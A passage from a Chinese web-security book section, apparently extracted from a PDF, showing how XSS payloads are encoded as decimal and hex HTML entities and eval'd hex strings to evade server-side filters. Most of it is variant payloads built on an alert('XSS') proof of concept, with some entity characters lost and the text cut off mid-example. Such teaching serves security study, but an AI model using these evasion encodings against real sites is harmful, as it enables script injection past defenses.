利用字符编码.pdf

1.5.2 利用字符编码 字符编码在跨站脚本中经常运用到，透过这种技巧，不仅能让XSS 代码绕过服务端的过滤， 还能更好地隐藏Shellcode 。 如前文所述，HTML 标签中的某些属性值可以使用#ASCII 方式进行编码改写，这种XSS 转码支持十进制和十六进制形式。 为了方便测试，我们接下来使用一个 XSS 编码工具，以便对字符串进行十进制和十六进制 的编码解码，该工具还可以实现ESCAPE 转码和解码，如图 1-41 所示。 以“img src=javascript:alert(XSS); ”为例，它的属性值为： javascript:alert(XSS); 进行十进制转码（# ）后得到： #106#97#118#97#115#99#114#105#112#116#58#97#108#101#114#116#40#39 #88#83#83#39#41#59 完整的XSS Expliot 如下： img src=#106#97#118#97#115#99#114#105#112#116#58#97#108#101#114#116#4 0#39#88#83#83#39#41#59 把以上代码保存在一个HTML 文档中，使用浏览器打开，脚本代码执行完成，如图 1-42 所 示。 ▲图1-41 XSS 编码工具 ▲图1-42 对XSS 代码进行编码 还可以在每个十进制字符后加上;，或者采用 #0 、#00、#000、#0000、#0; 、#00; 、 #000; 、#0000; 等形式，如下所示： img src=#106;#97;#118;#97;#115;#99;#114;#105;#112;#116;#58;#97;#108;#101 ;#114;#116;#40;#39;#88;#83;#83;#39;#41;#59; img src=#0106;#097;#0118;#097;#0115;#099;#0114;#0105;#0112;#0116;#058;#097 ;#0108;#0101;#0114;#0116;#040;#039;#088;#083;#083;#039;#041;059; img src=#0000106#000097#0000118#000097#0000115#000099#0000114#0000105# 0000112#0000116#000058#000097#0000108#0000101#0000114#0000116#000040#00003 9#000088#000083#000083#000039#000041#000059 类似地，也能采用十六进制编码形式： img src=#x6a#x61#x76#x61#x73#x63#x72#x69#x70#x74#x3a#x61#x6c#x65#x72#x 74#x28#x27#x58#x53#x53#x27#x29#x3b img src=#x6a;#x61;#x76;#x61;#x73;#x63;#x72;#x69;#x70;#x74;#x3a;#x61;# x6c;#x65;#x72;#x74;#x28;#x27;#x58;#x53;#x53;#x27;#x29;#x3b; img src=#x00006a#x000061#x000076#x000061#x000073#x000063#x000072#x000069# x000070#x000074#x00003a#x000061#x00006c#x000065#x000072#x000074#x000028#x0 00027#x000058#x000053#x000053#x000027#x000029#x00003b 另外，在 JavaScript 中有一个 eval()函数，该函数可计算字符串，并执行其中的 JavaScript 代码，如下所示： script eval(alert(XSS)); /script 我们可以使用\连接十六进制字符串，然后使用 eval() 函数执行十六进制字符串形式的脚本， 如对alert(XSS)进行十六进制转码后得到： \6